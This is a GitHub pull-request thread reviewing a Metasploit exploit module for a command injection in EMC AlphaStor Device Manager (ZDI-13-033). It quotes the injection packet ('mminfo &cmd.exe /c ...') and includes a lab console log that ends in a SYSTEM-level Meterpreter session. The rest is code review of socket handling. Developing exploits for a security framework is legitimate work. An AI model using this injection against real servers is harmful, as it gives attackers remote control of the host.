Module for ZDI-13-033 Alphastor Command Injection #3756
    rescue EOFError
      fail_with(Failure::Unknown, "Failed to deploy CMD Stager")
    end
    disconnect
Do you need to "ensure" this one?
FWIW, I ensure my disconnect. I think it's important.
cleanup (after fail_with) will disconnect
Sorry for delays. Thanks for your help and thank you KernelSmith. Still testing on 2k8.

On Mon, Sep 8, 2014 at 11:34 AM, Juan Vazquez notifications@github.com wrote:
In modules/exploits/windows/emc/alphastor_device_manager_exec.rb:
- def exploit
- execute_cmdstager({ :linemax => 487 })
- end
- def execute_command(cmd, opts)
- padding = rand_text_alpha_upper(489 - cmd.length)
- packet = "\x75~ mminfo &cmd.exe /c #{cmd} & #{padding}"# #{padding}"
- connect
- sock.put(packet)
- begin
sock.get_once
- rescue EOFError
fail_with(Failure::Unknown, "Failed to deploy CMD Stager")
- end
- disconnect
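Review bot: in execute_command, `connect` and `sock.put(packet)` sit outside the `begin`/`rescue EOFError` block, so a peer that drops the connection during the write raises out of execute_command unhandled instead of reaching `fail_with(Failure::Unknown, "Failed to deploy CMD Stager")`; moving `sock.put(packet)` inside the `begin` (and rescuing the socket-level connection errors alongside `EOFError`) keeps the failure reporting on one path. The trailing `disconnect` is skipped on the fail_with path as well; that is fine only because the framework's cleanup closes the socket, which this thread confirms, but a one-line comment saying so would spare the next reviewer the same question. Separately, `rand_text_alpha_upper(489 - cmd.length)` silently assumes `cmd.length <= 489`; the relation between `:linemax => 487`, 489 and the fixed prefix in `packet` deserves a comment or a guard so the invariant is visible where it is relied on.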
cleanup (after fail_with) will disconnect
(https://github.com/rapid7/metasploit-framework/pull/3756/files#r17245521)
> cleanup (after fail_with) will disconnect

cleanup in exploit.rb?
No, I was speaking about Exploit::Remote::Tcp:

    def cleanup
      super
      disconnect
    end

But yup, you're right, cleanup on exploit.rb probably will abort the socket even before Exploit::Remote::Tcp.
Ok thanks. Well this got my attention because at line 115, the disconnect is in an ensure block, but this one isn't. If cleanup kicks in all the time (and I think it should), then this isn't an issue.
Module looks good to me. I'll let others review.
You're correct, on line 115 (send_packet) I'm disconnecting inside an ensure block because the rescue block doesn't fail_with.

In that case I want the module to continue running (even in case of Exception) and I want to be sure that disconnect is called before returning from send_packet.
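The two patterns discussed in this thread, reduced to plain Ruby so the exception flow can be observed: this is an added example, not code from the pull request or from Metasploit. FakeSock, MiniModule, ExploitFailed and trace are constructed stand-ins for the socket, the module, fail_with and the framework's run-then-cleanup driver; the real framework classes are not used.

```ruby
# Added example, not code from the pull request or from Metasploit itself.
# FakeSock, MiniModule, ExploitFailed and trace are constructed stand-ins.

# Constructed fake connection: records whether it was closed and can be told
# to raise on read, mimicking a peer that drops the socket mid-exchange.
class FakeSock
  attr_reader :closed

  def initialize(raises: nil)
    @raises = raises
    @closed = false
  end

  def get_once
    raise @raises if @raises
    "OK"
  end

  def close
    @closed = true
  end
end

# Stand-in for what fail_with does in the framework: it raises, so the module
# run is aborted at that point.
class ExploitFailed < StandardError; end

class MiniModule
  attr_reader :sock, :disconnects

  def initialize(sock)
    @sock = sock
    @disconnects = 0
  end

  def disconnect
    sock.close
    @disconnects += 1
  end

  # Pattern A (send_packet on the page): the rescue swallows EOFError so the
  # module keeps running, therefore disconnect lives in `ensure` and runs on
  # success, on the rescued error and on any unexpected exception alike.
  def send_packet
    sock.get_once
  rescue EOFError
    nil
  ensure
    disconnect
  end

  # Pattern B (execute_command on the page): the rescue aborts via fail_with,
  # so the trailing disconnect is reached only on success; on the failure
  # path the framework's cleanup hook is what closes the socket.
  def execute_command
    begin
      sock.get_once
    rescue EOFError
      raise ExploitFailed, "Failed to deploy CMD Stager"
    end
    disconnect
  end

  # Stand-in for Exploit::Remote::Tcp#cleanup, which the framework calls after
  # the run whether it returned or raised.
  def cleanup
    disconnect unless sock.closed
  end
end

# Runs one pattern against a fresh fake socket and reports how the run ended
# and how many times disconnect ran before and after cleanup.
def trace(pattern, error = nil)
  mod = MiniModule.new(FakeSock.new(raises: error))
  result = begin
    mod.public_send(pattern)
    :ok
  rescue ExploitFailed => e
    e.message
  rescue StandardError => e
    "unhandled #{e.class}"
  end
  before = mod.disconnects
  mod.cleanup
  { result: result, disconnects_before_cleanup: before, disconnects_total: mod.disconnects }
end

if $PROGRAM_NAME == __FILE__
  [[:send_packet, nil], [:send_packet, EOFError], [:send_packet, IOError],
   [:execute_command, nil], [:execute_command, EOFError], [:execute_command, IOError]].each do |pattern, err|
    puts "#{pattern} / #{err || 'no error'}: #{trace(pattern, err)}"
  end
end
```

The traces show the point the thread settles on: with `ensure`, disconnect has already run by the time send_packet returns or raises, for a rescued EOFError and for an unrelated IOError alike; without it, execute_command leaves the socket open on every error path and the count only reaches one once cleanup runs. Relying on cleanup is therefore sound exactly when the framework is guaranteed to call it, which is the condition the review asks about.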
Hi Juan,

I tested your exploit on EMC Alphastor version 3 on win2k8 and it works. I don't have access to the version of EMC you used but it works on 3 as well.
MacBook-Pro:metasploit-framework inkrypto$ ./msfconsole -q -n
[-] ***
[-] * WARNING: Database support has been disabled
[-] ***
msf > use exploit/windows/emc/emc_juan
msf exploit(emc_juan) > set rhost 192.168.34.240
rhost => 192.168.34.240
msf exploit(emc_juan) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(emc_juan) > show options

Module options (exploit/windows/emc/emc_juan):

   Name   Current Setting  Required  Description
   RHOST  192.168.34.240   yes       The target address
   RPORT  3000             yes       The target port

Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     192.168.34.240   no        The target address

Exploit target:

   Id  Name
   0   EMC AlphaStor 4.0 < build 800 / Windows Universal

msf exploit(emc_juan) > exploit -j
[*] Exploit running as background job.
[*] Started bind handler
msf exploit(emc_juan) > [*] Command Stager progress - 0.46% done (486/105647 bytes)
[*] Command Stager progress - 0.92% done (972/105647 bytes)
[*] Command Stager progress - 1.38% done (1458/105647 bytes)
[*] Command Stager progress - 1.84% done (1944/105647 bytes)
[*] Command Stager progress - 2.30% done (2430/105647 bytes)
[*] Command Stager progress - 2.76% done (2916/105647 bytes)
[*] Command Stager progress - 3.22% done (3402/105647 bytes)
[*] Command Stager progress - 3.68% done (3888/105647 bytes)
[*] Command Stager progress - 4.14% done (4374/105647 bytes)
[*] Command Stager progress - 4.60% done (4860/105647 bytes)
[*] Command Stager progress - 5.06% done (5346/105647 bytes)
[*] Command Stager progress - 5.52% done (5832/105647 bytes)
[*] Command Stager progress - 5.98% done (6318/105647 bytes)
[*] Command Stager progress - 6.44% done (6804/105647 bytes)
[*] Command Stager progress - 6.90% done (7290/105647 bytes)
[*] Command Stager progress - 7.36% done (7776/105647 bytes)
[*] Command Stager progress - 7.82% done (8262/105647 bytes)
[*] Command Stager progress - 8.28% done (8748/105647 bytes)
[*] Command Stager progress - 8.74% done (9234/105647 bytes)
[*] Command Stager progress - 9.20% done (9720/105647 bytes)
[*] Command Stager progress - 9.66% done (10206/105647 bytes)
[*] Command Stager progress - 10.12% done (10692/105647 bytes)
[*] Command Stager progress - 10.58% done (11178/105647 bytes)
[*] Command Stager progress - 11.04% done (11664/105647 bytes)
[*] Command Stager progress - 11.50% done (12150/105647 bytes)
[*] Command Stager progress - 11.96% done (12636/105647 bytes)
[*] Command Stager progress - 12.42% done (13122/105647 bytes)
[*] Command Stager progress - 12.88% done (13608/105647 bytes)
[*] Command Stager progress - 13.34% done (14094/105647 bytes)
[*] Command Stager progress - 13.80% done (14580/105647 bytes)
[*] Command Stager progress - 14.26% done (15066/105647 bytes)
[*] Command Stager progress - 14.72% done (15552/105647 bytes)
[*] Command Stager progress - 15.18% done (16038/105647 bytes)
[*] Command Stager progress - 15.64% done (16524/105647 bytes)
[*] Command Stager progress - 16.10% done (17010/105647 bytes)
[*] Command Stager progress - 16.56% done (17496/105647 bytes)
[*] Command Stager progress - 17.02% done (17982/105647 bytes)
[*] Command Stager progress - 17.48% done (18468/105647 bytes)
[*] Command Stager progress - 17.94% done (18954/105647 bytes)
[*] Command Stager progress - 18.40% done (19440/105647 bytes)
[*] Command Stager progress - 18.86% done (19926/105647 bytes)
[*] Command Stager progress - 19.32% done (20412/105647 bytes)
[*] Command Stager progress - 19.78% done (20898/105647 bytes)
[*] Command Stager progress - 20.24% done (21384/105647 bytes)
[*] Command Stager progress - 20.70% done (21870/105647 bytes)
[*] Command Stager progress - 21.16% done (22356/105647 bytes)
[*] Command Stager progress - 21.62% done (22842/105647 bytes)
[*] Command Stager progress - 22.08% done (23328/105647 bytes)
[*] Command Stager progress - 22.54% done (23814/105647 bytes)
[*] Command Stager progress - 23.00% done (24300/105647 bytes)
[*] Command Stager progress - 23.46% done (24786/105647 bytes)
[*] Command Stager progress - 23.92% done (25272/105647 bytes)
[*] Command Stager progress - 24.38% done (25758/105647 bytes)
[*] Command Stager progress - 24.84% done (26244/105647 bytes)
[*] Command Stager progress - 25.30% done (26730/105647 bytes)
[*] Command Stager progress - 25.76% done (27216/105647 bytes)
[*] Command Stager progress - 26.22% done (27702/105647 bytes)
[*] Command Stager progress - 26.68% done (28188/105647 bytes)
[*] Command Stager progress - 27.14% done (28674/105647 bytes)
[*] Command Stager progress - 27.60% done (29160/105647 bytes)
[*] Command Stager progress - 28.06% done (29646/105647 bytes)
[*] Command Stager progress - 28.52% done (30132/105647 bytes)
[*] Command Stager progress - 28.98% done (30618/105647 bytes)
[*] Command Stager progress - 29.44% done (31104/105647 bytes)
[*] Command Stager progress - 29.90% done (31590/105647 bytes)
[*] Command Stager progress - 30.36% done (32076/105647 bytes)
[*] Command Stager progress - 30.82% done (32562/105647 bytes)
[*] Command Stager progress - 31.28% done (33048/105647 bytes)
[*] Command Stager progress - 31.74% done (33534/105647 bytes)
[*] Command Stager progress - 32.20% done (34020/105647 bytes)
[*] Command Stager progress - 32.66% done (34506/105647 bytes)
[*] Command Stager progress - 33.12% done (34992/105647 bytes)
[*] Command Stager progress - 33.58% done (35478/105647 bytes)
[*] Command Stager progress - 34.04% done (35964/105647 bytes)
[*] Command Stager progress - 34.50% done (36450/105647 bytes)
[*] Command Stager progress - 34.96% done (36936/105647 bytes)
[*] Command Stager progress - 35.42% done (37422/105647 bytes)
[*] Command Stager progress - 35.88% done (37908/105647 bytes)
[*] Command Stager progress - 36.34% done (38394/105647 bytes)
[*] Command Stager progress - 36.80% done (38880/105647 bytes)
[*] Command Stager progress - 37.26% done (39366/105647 bytes)
[*] Command Stager progress - 37.72% done (39852/105647 bytes)
[*] Command Stager progress - 38.18% done (40338/105647 bytes)
[*] Command Stager progress - 38.64% done (40824/105647 bytes)
[*] Command Stager progress - 39.10% done (41310/105647 bytes)
[*] Command Stager progress - 39.56% done (41796/105647 bytes)
[*] Command Stager progress - 40.02% done (42282/105647 bytes)
[*] Command Stager progress - 40.48% done (42768/105647 bytes)
[*] Command Stager progress - 40.94% done (43254/105647 bytes)
[*] Command Stager progress - 41.40% done (43740/105647 bytes)
[*] Command Stager progress - 41.86% done (44226/105647 bytes)
[*] Command Stager progress - 42.32% done (44712/105647 bytes)
[*] Command Stager progress - 42.78% done (45198/105647 bytes)
[*] Command Stager progress - 43.24% done (45684/105647 bytes)
[*] Command Stager progress - 43.70% done (46170/105647 bytes)
[*] Command Stager progress - 44.16% done (46656/105647 bytes)
[*] Command Stager progress - 44.62% done (47142/105647 bytes)
[*] Command Stager progress - 45.08% done (47628/105647 bytes)
[*] Command Stager progress - 45.54% done (48114/105647 bytes)
[*] Command Stager progress - 46.00% done (48600/105647 bytes)
[*] Command Stager progress - 46.46% done (49086/105647 bytes)
[*] Command Stager progress - 46.92% done (49572/105647 bytes)
[*] Command Stager progress - 47.38% done (50058/105647 bytes)
[*] Command Stager progress - 47.84% done (50544/105647 bytes)
[*] Command Stager progress - 48.30% done (51030/105647 bytes)
[*] Command Stager progress - 48.76% done (51516/105647 bytes)
[*] Command Stager progress - 49.22% done (52002/105647 bytes)
[*] Command Stager progress - 49.68% done (52488/105647 bytes)
[*] Command Stager progress - 50.14% done (52974/105647 bytes)
[*] Command Stager progress - 50.60% done (53460/105647 bytes)
[*] Command Stager progress - 51.06% done (53946/105647 bytes)
[*] Command Stager progress - 51.52% done (54432/105647 bytes)
[*] Command Stager progress - 51.98% done (54918/105647 bytes)
[*] Command Stager progress - 52.44% done (55404/105647 bytes)
[*] Command Stager progress - 52.90% done (55890/105647 bytes)
[*] Command Stager progress - 53.36% done (56376/105647 bytes)
[*] Command Stager progress - 53.82% done (56862/105647 bytes)
[*] Command Stager progress - 54.28% done (57348/105647 bytes)
[*] Command Stager progress - 54.74% done (57834/105647 bytes)
[*] Command Stager progress - 55.20% done (58320/105647 bytes)
[*] Command Stager progress - 55.66% done (58806/105647 bytes)
[*] Command Stager progress - 56.12% done (59292/105647 bytes)
[*] Command Stager progress - 56.58% done (59778/105647 bytes)
[*] Command Stager progress - 57.04% done (60264/105647 bytes)
[*] Command Stager progress - 57.50% done (60750/105647 bytes)
[*] Command Stager progress - 57.96% done (61236/105647 bytes)
[*] Command Stager progress - 58.42% done (61722/105647 bytes)
[*] Command Stager progress - 58.88% done (62208/105647 bytes)
[*] Command Stager progress - 59.34% done (62694/105647 bytes)
[*] Command Stager progress - 59.80% done (63180/105647 bytes)
[*] Command Stager progress - 60.26% done (63666/105647 bytes)
[*] Command Stager progress - 60.72% done (64152/105647 bytes)
[*] Command Stager progress - 61.18% done (64638/105647 bytes)
[*] Command Stager progress - 61.64% done (65124/105647 bytes)
[*] Command Stager progress - 62.10% done (65610/105647 bytes)
[*] Command Stager progress - 62.56% done (66096/105647 bytes)
[*] Command Stager progress - 63.02% done (66582/105647 bytes)
[*] Command Stager progress - 63.48% done (67068/105647 bytes)
[*] Command Stager progress - 63.94% done (67554/105647 bytes)
[*] Command Stager progress - 64.40% done (68040/105647 bytes)
[*] Command Stager progress - 64.86% done (68526/105647 bytes)
[*] Command Stager progress - 65.32% done (69012/105647 bytes)
[*] Command Stager progress - 65.78% done (69498/105647 bytes)
[*] Command Stager progress - 66.24% done (69984/105647 bytes)
[*] Command Stager progress - 66.70% done (70470/105647 bytes)
[*] Command Stager progress - 67.16% done (70956/105647 bytes)
[*] Command Stager progress - 67.62% done (71442/105647 bytes)
[*] Command Stager progress - 68.08% done (71928/105647 bytes)
[*] Command Stager progress - 68.54% done (72414/105647 bytes)
[*] Command Stager progress - 69.00% done (72900/105647 bytes)
[*] Command Stager progress - 69.46% done (73386/105647 bytes)
[*] Command Stager progress - 69.92% done (73872/105647 bytes)
[*] Command Stager progress - 70.38% done (74358/105647 bytes)
[*] Command Stager progress - 70.84% done (74844/105647 bytes)
[*] Command Stager progress - 71.30% done (75330/105647 bytes)
[*] Command Stager progress - 71.76% done (75816/105647 bytes)
[*] Command Stager progress - 72.22% done (76302/105647 bytes)
[*] Command Stager progress - 72.68% done (76788/105647 bytes)
[*] Command Stager progress - 73.14% done (77274/105647 bytes)
[*] Command Stager progress - 73.60% done (77760/105647 bytes)
[*] Command Stager progress - 74.06% done (78246/105647 bytes)
[*] Command Stager progress - 74.52% done (78732/105647 bytes)
[*] Command Stager progress - 74.98% done (79218/105647 bytes)
[*] Command Stager progress - 75.44% done (79704/105647 bytes)
[*] Command Stager progress - 75.90% done (80190/105647 bytes)
[*] Command Stager progress - 76.36% done (80676/105647 bytes)
[*] Command Stager progress - 76.82% done (81162/105647 bytes)
[*] Command Stager progress - 77.28% done (81648/105647 bytes)
[*] Command Stager progress - 77.74% done (82134/105647 bytes)
[*] Command Stager progress - 78.20% done (82620/105647 bytes)
[*] Command Stager progress - 78.66% done (83106/105647 bytes)
[*] Command Stager progress - 79.12% done (83592/105647 bytes)
[*] Command Stager progress - 79.58% done (84078/105647 bytes)
[*] Command Stager progress - 80.04% done (84564/105647 bytes)
[*] Command Stager progress - 80.50% done (85050/105647 bytes)
[*] Command Stager progress - 80.96% done (85536/105647 bytes)
[*] Command Stager progress - 81.42% done (86022/105647 bytes)
[*] Command Stager progress - 81.88% done (86508/105647 bytes)
[*] Command Stager progress - 82.34% done (86994/105647 bytes)
[*] Command Stager progress - 82.80% done (87480/105647 bytes)
[*] Command Stager progress - 83.26% done (87966/105647 bytes)
[*] Command Stager progress - 83.72% done (88452/105647 bytes)
[*] Command Stager progress - 84.18% done (88938/105647 bytes)
[*] Command Stager progress - 84.64% done (89424/105647 bytes)
[*] Command Stager progress - 85.10% done (89910/105647 bytes)
[*] Command Stager progress - 85.56% done (90396/105647 bytes)
[*] Command Stager progress - 86.02% done (90882/105647 bytes)
[*] Command Stager progress - 86.48% done (91368/105647 bytes)
[*] Command Stager progress - 86.94% done (91854/105647 bytes)
[*] Command Stager progress - 87.40% done (92340/105647 bytes)
[*] Command Stager progress - 87.86% done (92826/105647 bytes)
[*] Command Stager progress - 88.32% done (93312/105647 bytes)
[*] Command Stager progress - 88.78% done (93798/105647 bytes)
[*] Command Stager progress - 89.24% done (94284/105647 bytes)
[*] Command Stager progress - 89.70% done (94770/105647 bytes)
[*] Command Stager progress - 90.16% done (95256/105647 bytes)
[*] Command Stager progress - 90.62% done (95742/105647 bytes)
[*] Command Stager progress - 91.08% done (96228/105647 bytes)
[*] Command Stager progress - 91.54% done (96714/105647 bytes)
[*] Command Stager progress - 92.00% done (97200/105647 bytes)
[*] Command Stager progress - 92.46% done (97686/105647 bytes)
[*] Command Stager progress - 92.92% done (98172/105647 bytes)
[*] Command Stager progress - 93.38% done (98658/105647 bytes)
[*] Command Stager progress - 93.84% done (99144/105647 bytes)
[*] Command Stager progress - 94.30% done (99630/105647 bytes)
[*] Command Stager progress - 94.76% done (100116/105647 bytes)
[*] Command Stager progress - 95.22% done (100602/105647 bytes)
[*] Command Stager progress - 95.68% done (101088/105647 bytes)
[*] Command Stager progress - 96.14% done (101574/105647 bytes)
[*] Command Stager progress - 96.60% done (102060/105647 bytes)
[*] Command Stager progress - 97.06% done (102546/105647 bytes)
[*] Command Stager progress - 97.52% done (103032/105647 bytes)
[*] Command Stager progress - 97.96% done (103493/105647 bytes)
[*] Command Stager progress - 98.40% done (103959/105647 bytes)
[*] Command Stager progress - 98.81% done (104388/105647 bytes)
[*] Command Stager progress - 99.20% done (104807/105647 bytes)
[*] Command Stager progress - 99.66% done (105289/105647 bytes)
[*] Command Stager progress - 100.00% done (105647/105647 bytes)
[*] Sending stage (769536 bytes) to 192.168.34.240
[*] Meterpreter session 1 opened (192.168.34.1:63984 -> 192.168.34.240:4444) at 2014-09-19 13:25:59 -0400
msf exploit(emc_juan) > sysinfo
[-] Unknown command: sysinfo.
msf exploit(emc_juan) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN-Q2U1UDO3BDD
OS              : Windows 2008 (Build 6002, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

On Tue, Sep 9, 2014 at 11:29 AM, Juan Vazquez notifications@github.com wrote:
In modules/exploits/windows/emc/alphastor_device_manager_exec.rb:
- def exploit
- execute_cmdstager({ :linemax => 487 })
- end
- def execute_command(cmd, opts)
- padding = rand_text_alpha_upper(489 - cmd.length)
- packet = "\x75~ mminfo &cmd.exe /c #{cmd} & #{padding}"# #{padding}"
- connect
- sock.put(packet)
- begin
sock.get_once
- rescue EOFError
fail_with(Failure::Unknown, "Failed to deploy CMD Stager")
- end
- disconnect
You're correct, on line 115 (send_packet) I'm disconnecting inside an ensure block because the rescue block doesn't fail_with. In that case I want the module to continue running (even in case of Exception) and I want to be sure that disconnect is called before returning from send_packet.
(https://github.com/rapid7/metasploit-framework/pull/3756/files#r17307778)
Thanks for testing @inkrypto! If you feel comfortable with this pull request going ahead, feel free to land inkrypto#1 into your repository. So #3686 will be automatically updated to split the module related to ZDI-13-033. Thanks!
Thanks dude. Just so I am clear, put your new module in my repo and then

On Mon, Sep 22, 2014 at 9:46 AM, Juan Vazquez notifications@github.com
@inkrypto you don't need to do it (unless you want, of course). You can just merge inkrypto#1 into your repository (at the bottom of the pull request you should see instructions for merging). Once you merge inkrypto#1, #3686 will be automatically updated. After that, we can use #3686 to continue with the buffer overflow modules, and this one to land the command injection module. If you prefer to resubmit the module in this pull request (command injection) by yourself you can do it too! of course! I just would ask you to do a new pull request for the new module (command injection). It's easier to handle pull requests with just one module at a time.
Ok thanks Juan, no resubmit,

On Mon, Sep 22, 2014 at 4:57 PM, Juan Vazquez notifications@github.com
I've been working on one of the modules submitted on #3686, the one I think is more reliable because it is a command injection vulnerability, not a memory corruption. Since the author has not answered the last comments, I'm trying to help. I really would like to see this target covered on metasploit.
Originally the module for ZDI-13-033 was submitted as Auxiliary module, this pull request converts it to an exploit module and submits it as a single pull request.
I'm also submitting a pull request to #3686 to delete the auxiliary module, since the vulnerability will be covered by this exploit.
I've tested the module on EMC Alphastor 4.0 with Win 2003 SP2 and Win 2008 R2 successfully.
@kernelsmith: would you like to test the module? If you get some time and could verify it, it would be super appreciated! (no rush!)
@inkrypto, as original module author, would you like to review / check / comment / test? Also if you feel more comfortable, feel free to get the changes in this pull request and make your own pull request :) no problem at all on my side. I would close this one!